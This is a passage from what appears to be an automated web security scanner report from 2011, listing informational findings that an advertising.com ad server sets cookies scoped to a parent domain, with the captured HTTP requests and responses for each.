Cookie: ACID=qw280013054845430029; ASCID=qw280013054845430029; C2=E0B0NFJwIsb0F8QqHjQCiZEYi+CCeziBwB; aceRTB=rm%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cam%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cdc%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Can%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Crub%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7C; F1=BkRHQ3EBAAAABAAAAQAAgEA; BASE=x7Q9Ei23SwnkpMdYS8Ne5ru2BcaVK0Bv+kOPmTH!; ROLL=U6APGje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpO!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:37:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1007584.776692.0XMC
Set-Cookie: F1=BwWHQ3EBAAAABAAAAUAAgEA; domain=advertising.com; expires=Tue, 14-May-2013 18:37:32 GMT; path=/
Set-Cookie: BASE=x7Q9Ei23SwnkpMdYS8Ne5ru2BcaVK0Bv+kWPmTH!; domain=advertising.com; expires=Tue, 14-May-2013 18:37:32 GMT; path=/
Set-Cookie: ROLL=U6APHje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+I!; domain=advertising.com; expires=Tue, 14-May-2013 18:37:32 GMT; path=/
Set-Cookie: 28905079=_4dd01d6c,7613878875,776692^1007584^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:37:32 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 601

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5155.272756.AOL-ADVERTISING/B5116932;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000776692/mnum
...[SNIP]...

13.35. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=36738221/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=776692/size=728090/u=2/bnum=36738221/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=776692/size=728090/u=2/bnum=36738221/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=index&t=6506
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; ASCID=qw280013054845430029; C2=A0B0NFJwIsb0F8QqHjQCiZEY; F1=BEQHQ3EBAAAABAAAAIAAgEA; BASE=x7Q9Ci23SwnkpMdYS8Ne5rO!; ROLL=U6APAje2uuEWubpKMml2fHG!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:35:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1007584.776692.0XMC
Set-Cookie: F1=BQQHQ3EBAAAABAAAAMAAgEA; domain=advertising.com; expires=Tue, 14-May-2013 18:35:47 GMT; path=/
Set-Cookie: BASE=x7Q9Di23SwnkpMdYS8Ne5ruGfsaVK0B!; domain=advertising.com; expires=Tue, 14-May-2013 18:35:47 GMT; path=/
Set-Cookie: ROLL=U6APBje2uuEWubpKMml2fH2WGhDmKrC!; domain=advertising.com; expires=Tue, 14-May-2013 18:35:47 GMT; path=/
Set-Cookie: 36738221=_4dd01d04,1850234033,776692^1007584^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:35:47 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 601

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5155.272756.AOL-ADVERTISING/B5116932;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000776692/mnum
...[SNIP]...

13.36. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=37579081/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fforgot_password.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=776692/size=728090/u=2/bnum=37579081/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fforgot_password.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=776692/size=728090/u=2/bnum=37579081/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fforgot_password.html HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=forgot_password&t=8617
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; ASCID=qw280013054845430029; C2=E0B0NFJwIsb0F8QqHjQCiZEYi+CCeziBwB; F1=BQQHQ3EBAAAABAAAAMAAgEA; BASE=x7Q9Di23SwnkpMdYS8Ne5ru2BcaVK0B!; ROLL=U6APBje2uuEWubpKMml2fH2mYRDmKrC!; aceRTB=rm%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cam%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cdc%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Can%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Crub%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7C

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:36:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1007584.776692.0XMC
Set-Cookie: F1=BkRHQ3EBAAAABAAAAQAAgEA; domain=advertising.com; expires=Tue, 14-May-2013 18:36:09 GMT; path=/
Set-Cookie: BASE=x7Q9Ei23SwnkpMdYS8Ne5ru2BcaVK0Bv+kOPmTH!; domain=advertising.com; expires=Tue, 14-May-2013 18:36:09 GMT; path=/
Set-Cookie: ROLL=U6APGje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpO!; domain=advertising.com; expires=Tue, 14-May-2013 18:36:09 GMT; path=/
Set-Cookie: 37579081=_4dd01d19,3084744114,776692^1007584^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:36:09 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 601

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5155.272756.AOL-ADVERTISING/B5116932;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000776692/mnum
...[SNIP]...

13.37. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=42928792/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fhelp.html%253Ftopic%253Dreport-abuse

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=776692/size=728090/u=2/bnum=42928792/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fhelp.html%253Ftopic%253Dreport-abuse

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=776692/size=728090/u=2/bnum=42928792/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fhelp.html%253Ftopic%253Dreport-abuse HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=help&t=7950
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; ASCID=qw280013054845430029; aceRTB=rm%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cam%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cdc%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Can%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Crub%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7C; C2=o2B0NFJwIsb0F8QqHjQCiZEYi+CCeziBwB; F1=BwaHQ3EBAAAABAAAAwAAgEA; BASE=x7Q9Ii23SwnkpMdYS8Ne5ru2BcaVK0Bv+kuPmTntoWJelwznY4jXxpCTjtvy2vvmXa3CqqC!; ROLL=U6APOje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlIxo0kTqWZc1o6Dt86oeMfhU88Mx1KlZddqdZLZ49wJCPtHdWF!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:38:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.972219.776692.0XMC
Set-Cookie: F1=B4aHQ3EBAAAABAAAA0AAgEA; domain=advertising.com; expires=Tue, 14-May-2013 18:38:39 GMT; path=/
Set-Cookie: BASE=x7Q9Ji23SwnkpMdYS8Ne5ru2BcaVK0Bv+kuPmTntoWJelwznY4jXxpCTjtvy2vvmXa3CqqiTY9EZTNH!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:39 GMT; path=/
Set-Cookie: ROLL=U6APPje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlIxo0kTqWZc1o6Dt86oeMfhU88Mx1KlZddqdZLZ49wJCPtHdWluzNpOTwO!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:39 GMT; path=/
Set-Cookie: 42928792=_4dd01dae,3412827100,776692^972219^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:38:39 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 1553

document.write('<HTML>');document.write('<HEAD>');document.write('<TITLE>&nbsp;</TITLE>');document.write('</HEAD>');document.write('<BODY>');document.write('<OBJECT classid=\'clsid:D27CDB6E-AE6D-11cf-
...[SNIP]...

13.38. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=44415793/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fterms_of_service.html%253F

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=776692/size=728090/u=2/bnum=44415793/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fterms_of_service.html%253F

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=776692/size=728090/u=2/bnum=44415793/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fterms_of_service.html%253F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=terms_of_service&t=6042
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; ASCID=qw280013054845430029; aceRTB=rm%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cam%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cdc%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Can%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Crub%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7C; C2=s1B0NFJwIsb0F8QqHjQCiZEYi+CCeziBwB; F1=BAaHQ3EBAAAABAAAAcAAgEA; BASE=x7Q9Ei23SwnkpMdYS8Ne5ru2BcaVK0Bv+kmPmTH!; ROLL=U6APFje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlIxo0kTqWJ!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:38:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1007584.776692.0XMC
Set-Cookie: F1=BIaHQ3EBAAAABAAAAgAAgEA; domain=advertising.com; expires=Tue, 14-May-2013 18:38:26 GMT; path=/
Set-Cookie: BASE=x7Q9Ei23SwnkpMdYS8Ne5ru2BcaVK0Bv+kuPmTH!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:26 GMT; path=/
Set-Cookie: ROLL=U6APKje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlIxo0kTqWZc1o6Dt8K!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:26 GMT; path=/
Set-Cookie: 44415793=_4dd01da2,0160042632,776692^1007584^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:38:26 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 601

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5155.272756.AOL-ADVERTISING/B5116932;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000776692/mnum
...[SNIP]...

13.39. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=49573366/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fsafety.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=776692/size=728090/u=2/bnum=49573366/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fsafety.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=776692/size=728090/u=2/bnum=49573366/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fsafety.html HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=safety&t=250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; ASCID=qw280013054845430029; aceRTB=rm%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cam%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cdc%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Can%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Crub%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7C; C2=s1B0NFJwIsb0F8QqHjQCiZEYi+CCeziBwB; F1=BIaHQ3EBAAAABAAAAgAAgEA; BASE=x7Q9Ei23SwnkpMdYS8Ne5ru2BcaVK0Bv+kuPmTH!; ROLL=U6APKje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlIxo0kTqWZc1o6Dt8K!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:38:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1008666.776692.0XMC
Set-Cookie: F1=BYaHQ3EBAAAABAAAAkAAgEA; domain=advertising.com; expires=Tue, 14-May-2013 18:38:30 GMT; path=/
Set-Cookie: BASE=x7Q9Fi23SwnkpMdYS8Ne5ru2BcaVK0Bv+kuPmTntoWJelwD!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:30 GMT; path=/
Set-Cookie: ROLL=U6APLje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlIxo0kTqWZc1o6Dt86oeMfhU8M!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:30 GMT; path=/
Set-Cookie: 49573366=_4dd01da6,6001177635,776692^1008666^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:38:30 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 598

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N339.americaonline.com/B5422295.16;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000776692/mnum=00
...[SNIP]...

13.40. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=58838557/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=776692/size=728090/u=2/bnum=58838557/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=776692/size=728090/u=2/bnum=58838557/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=index&t=5598
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; ASCID=qw280013054845430029; C2=A0B0NFJwIsb0F8QqHjQCiZEY; F1=BAQHQ3EBAAAABAAAAEAAgEA; BASE=x7Q9Bi23SwnkpMN!; ROLL=U6APDje2uuEWubJ!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:35:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.944423.776692.0XMC
Set-Cookie: F1=BEQHQ3EBAAAABAAAAIAAgEA; domain=advertising.com; expires=Tue, 14-May-2013 18:35:45 GMT; path=/
Set-Cookie: BASE=x7Q9Ci23SwnkpMdYS8Ne5rO!; domain=advertising.com; expires=Tue, 14-May-2013 18:35:45 GMT; path=/
Set-Cookie: ROLL=U6APAje2uuEWubpKMml2fHG!; domain=advertising.com; expires=Tue, 14-May-2013 18:35:45 GMT; path=/
Set-Cookie: 58838557=_4dd01d01,6753824420,776692^944423^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:35:45 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 1046

function AdClicked(url)
{
var clickLineDisabled = "$dcli";
if(clickLineDisabled=="1")
{
return;
}

var winOpen = "1";
if(winOpen == "1")
{
w
...[SNIP]...

13.41. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=68130074/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fbrowse.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=776692/size=728090/u=2/bnum=68130074/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fbrowse.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=776692/size=728090/u=2/bnum=68130074/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fbrowse.html HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=browse&t=5998
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; ASCID=qw280013054845430029; aceRTB=rm%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cam%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cdc%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Can%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Crub%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7C; C2=o2B0NFJwIsb0F8QqHjQCiZEYi+CCeziBwB; F1=BkaHQ3EBAAAABAAAAsAAgEA; BASE=x7Q9Hi23SwnkpMdYS8Ne5ru2BcaVK0Bv+kuPmTntoWJelwznY4jXxpCTjtvy2vP!; ROLL=U6APJje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlIxo0kTqWZc1o6Dt86oeMfhU88Mx1KlZddqdZLZ49A!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:38:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.955434.776692.0XMC
Set-Cookie: F1=BwaHQ3EBAAAABAAAAwAAgEA; domain=advertising.com; expires=Tue, 14-May-2013 18:38:36 GMT; path=/
Set-Cookie: BASE=x7Q9Ii23SwnkpMdYS8Ne5ru2BcaVK0Bv+kuPmTntoWJelwznY4jXxpCTjtvy2vvmXa3CqqC!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:36 GMT; path=/
Set-Cookie: ROLL=U6APOje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlIxo0kTqWZc1o6Dt86oeMfhU88Mx1KlZddqdZLZ49wJCPtHdWF!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:36 GMT; path=/
Set-Cookie: 68130074=_4dd01dac,0641043210,776692^955434^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:38:36 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 1583

document.write('<HTML>');document.write('<HEAD>');document.write('<TITLE>&nbsp;</TITLE>');document.write('</HEAD>');document.write('<BODY>');document.write('<OBJECT classid=\'clsid:D27CDB6E-AE6D-11cf-
...[SNIP]...

13.42. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=69569526/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fterms_of_service.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=776692/size=728090/u=2/bnum=69569526/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fterms_of_service.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

